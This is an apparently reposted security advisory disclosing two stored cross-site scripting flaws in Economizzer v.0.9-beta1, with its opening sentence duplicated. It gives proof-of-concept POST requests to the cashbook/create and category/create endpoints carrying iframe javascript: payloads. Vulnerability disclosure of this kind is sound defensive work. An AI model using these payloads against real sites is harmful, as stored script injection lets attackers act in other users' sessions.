A persistent cross-site scripting (XSS) vulnerability exists in gugoan's
Economizzer v.0.9-beta1 A persistent cross-site scripting (XSS) vulnerability exists in gugoan's
Economizzer v.0.9-beta1 The application fails to properly sanitize
user-supplied input when creating a new cash book entry via the
*cashbook/create* endpoint. An attacker can inject malicious JavaScript
payloads that are permanently stored and later executed in the context of
any user who views the affected entry.
https://<host>/web/cashbook/create
POST /web/cashbook/create HTTP/2
Host: <host>
-
------WebKitFormBoundaryM93AAtGLA59fTnSU
--snip--
<iframe src="javascript:alert(4)">
------WebKitFormBoundaryM93AAtGLA59fTnSU
Content-Disposition: form-data; name="Cashbook[is_pending]"
--snip--
------- second advisory --------
A persistent cross-site scripting (XSS) vulnerability exists in gugoan's
Economizzer v.0.9-beta1. The application fails to properly sanitize
user-supplied input when creating a new category via the
*category/create *endpoint.
An attacker can inject malicious JavaScript payloads that are permanently
stored and later executed in the context of any user who views the affected
entry.
https://<host>/web/category/create
POST /web/category/create HTTP/2
Host: <host>
--snip--
Category%5Bdesc_category%5D=%3Ciframe+src%3D%22javascript%3Aalert%283%29%22%3E
--snip--
Economizzer 0.9-beta1 Cross Site Scripting
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 204
